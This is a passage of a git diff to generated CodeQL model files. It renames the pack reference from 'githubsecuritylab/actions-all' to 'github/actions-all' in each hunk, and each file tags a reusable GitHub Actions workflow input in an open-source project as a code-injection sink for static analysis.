["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "input.doc_base_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml b/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml index 6656d42c4e69..dc402bc1e458 100644 --- a/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["openmined/pysyft/.github/workflows/cd-post-release-tests.yml", "*", "input.release_platform", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml b/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml index 6e7fdc34a54b..b5d4d6e4bde0 100644 --- a/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "input.package-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml b/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml index 8fc02a27e1cd..83b45112b862 100644 --- a/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["openttd/openttd/.github/workflows/release-windows.yml", "*", "input.survey_key", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml b/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml index 80f19676b4a7..c40044c852ee 100644 --- a/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["openvinotoolkit/openvino/.github/workflows/job_tensorflow_models_tests.yml", "*", "input.model_scope", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml b/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml index 56b2ef6691e4..011787908473 100644 --- a/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["openxla/iree/.github/workflows/pkgci_regression_test_nvidiagpu_vulkan.yml", "*", "input.artifact_run_id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml b/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml index 7bc952a84834..9593323f325a 100644 --- a/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["openzfs/zfs/.github/workflows/zfs-linux-tests.yml", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml b/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml index 1c0663dd01c6..7901da27836d 100644 --- a/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "input.http-client", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml b/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml index 4da8f3276622..ccb1bd246546 100644 --- a/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["orange-opensource/hurl/.github/workflows/update-branch-version.yml", "*", "input.new_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml b/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml index 4e8adfafe3c2..8317fdabab05 100644 --- a/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["paolosalvatori/servicebusexplorer/.github/workflows/publish.yml", "*", "input.release-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml b/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml index 28cb702ce13c..529e1576e748 100644 --- a/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["parcel-bundler/parcel/.github/workflows/release.yml", "*", "input.release-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml b/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml index cb315ee4328c..d659fbc8089a 100644 --- a/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pardeike/harmony/.github/workflows/test-build.yml", "*", "input.build_configuration", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml b/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml index 956c4cba9669..9ca03d9aee1b 100644 --- a/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "input.configuration", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml b/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml index 804c1bdae4e2..725487f10050 100644 --- a/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pennylaneai/pennylane/.github/workflows/unit-test.yml", "*", "input.pytest_test_directory", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml b/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml index 78d91b2afb5f..2bda8bb60a53 100644 --- a/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pinecone-io/pinecone-python-client/.github/workflows/publish-to-pypi.yaml", "*", "input.prereleaseSuffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml b/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml index 31cadc3ff179..e91b615cbe64 100644 --- a/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pixie-io/pixie/.github/workflows/perf_common.yaml", "*", "input.tags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml b/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml index 11362fda1e55..e09e461e605e 100644 --- a/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["plantuml/plantuml/.github/workflows/native-image.yml", "*", "input.release-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml b/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml index 131cff3e92a8..f8dd54aee14d 100644 --- a/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "input.os", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml b/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml index acc5bf51e357..c4aaa28f00b1 100644 --- a/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["preactjs/preact/.github/workflows/run-bench.yml", "*", "input.benchmark", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml b/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml index c89d1c808c30..546dac977a80 100644 --- a/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["prismlauncher/prismlauncher/.github/workflows/build.yml", "*", "input.build_type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml b/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml index 0258c79e83f6..3a072fd9f07c 100644 --- a/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["product-os/flowzone/.github/workflows/flowzone.yml", "*", "input.ok_to_test_label", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml b/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml index ebeba1eb2268..08a5f8fc58ea 100644 --- a/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["project-oak/oak/.github/workflows/reusable_provenance.yaml", "*", "input.ent-public-key", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml b/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml index 5f709385839a..299c70daa54a 100644 --- a/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["prql/prql/.github/workflows/test-rust.yaml", "*", "input.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml b/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml index e96dbba0699d..3e03b65cb8b0 100644 --- a/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pulumi/pulumi/.github/workflows/ci-run-test.yml", "*", "input.test-command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml b/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml index 2a7a9afd5a68..20eb977b973a 100644 --- a/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSourceModel data: - ["puppeteer/puppeteer/.github/workflows/changed-packages.yml", "*", "output.changes", "filename", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml b/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml index 5094422f3fed..4e58b2fa38cc 100644 --- a/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/module_spec.yml", "*", "input.ignore_dependency_check", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml b/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml index dff837456454..6935bc7788d0 100644 --- a/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pyo3/maturin/.github/workflows/downstream.yml", "*", "input.manifest-dir", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml b/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml index 88b68dc4ea7f..94d733fa0c4e 100644 --- a/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pyo3/pyo3/.github/workflows/build.yml", "*", "input.extra-features", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml b/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml index 18c6974c74f4..6b1214886fe4 100644 --- a/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["python/cpython/.github/workflows/reusable-ubuntu.yml", "*", "input.options", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml b/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml index 561c3e15e641..4a97c50ad6e7 100644 --- a/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pytorch/botorch/.github/workflows/reusable_website.yml", "*", "input.release_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml b/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml index 961741f413f3..a6e4c3473f26 100644 --- a/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pytorch/xla/.github/workflows/_test.yml", "*", "input.test-script", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml b/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml index 985652a265b6..be72ba183574 100644 --- a/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["quarto-dev/quarto-cli/.github/workflows/test-smokes.yml", "*", "input.buckets", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml b/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml index 3103913ab4f9..5f4a4a09cd00 100644 --- a/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["rancher/dashboard/.github/workflows/build-extension-charts.yml", "*", "input.tagged_release", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml b/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml index b89c1307d2d4..4cadb751d755 100644 --- a/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["rasterio/rasterio/.github/workflows/test_gdal_build.yaml", "*", "input.gdal_ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml b/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml index 9e60cc61bb56..1257c67c1807 100644 --- a/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["redisearch/redisearch/.github/workflows/flow-build-artifacts.yml", "*", "input.architecture", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml b/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml index cac4e298538b..f0daee8757ea 100644 --- a/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["remix-run/remix/.github/workflows/stacks.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml b/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml index eb2669a96ead..85d3b564a78c 100644 --- a/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["rmcrackan/libation/.github/workflows/build-windows.yml", "*", "input.version_override", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml b/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml index 590e518d3508..01bda56c9a9b 100644 --- a/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["rocketchat/rocket.chat/.github/workflows/ci-test-e2e.yml", "*", "input.total-shard", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml b/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml index d55af595b1cb..4c9e9b1dc8fc 100644 --- a/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ruby/ruby.wasm/.github/workflows/build.yml", "*", "input.prerel_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml b/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml index 1fd6cd394bcc..30e54f94fc17 100644 --- a/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "input.target_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml b/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml index 3583052045b8..bb0c172bf0e1 100644 --- a/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["saadeghi/daisyui/.github/workflows/write-release-notes.yml", "*", "input.daisyuiversion", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml b/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml index f355ceee6da2..3a5ad21b22af 100644 --- a/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["sagemath/sage/.github/workflows/macos.yml", "*", "input.stage", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml b/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml index 2b9190c87af8..c161072bd3d8 100644 --- a/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["schemastore/schemastore/src/test/github-workflow/reusable-workflow.yaml", "*", "input.constraints", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml b/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml index 783ff3c04682..0362312f27a1 100644 --- a/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["scikit-learn/scikit-learn/.github/workflows/update_tracking_issue.yml", "*", "input.job_status", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml b/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml index de853d30588b..2ae5aab3b2cd 100644 --- a/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["seleniumhq/selenium/.github/workflows/bazel.yml", "*", "input.run", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml index 31f09278ecd3..e2c8ae625c20 100644 --- a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["shaka-project/shaka-packager/.github/workflows/publish-npm.yaml", "*", "input.latest", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml index d45a2e2a03a0..13461b602054 100644 --- a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "input.ignore_test_status", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml b/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml index 896400bf2f15..88e02dd04c45 100644 --- a/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["shimataro/ssh-key-action/.github/workflows/reusable-verify.yml", "*", "input.package_installation_command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml b/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml index ade06c90c26b..2f368497f013 100644 --- a/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["softfever/orcaslicer/.github/workflows/build_orca.yml", "*", "input.arch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml b/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml index f4c2d488ba37..64f3c2085402 100644 --- a/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["software-mansion/react-native-reanimated/.github/workflows/build-npm-package-action.yml", "*", "input.option", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml b/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml index 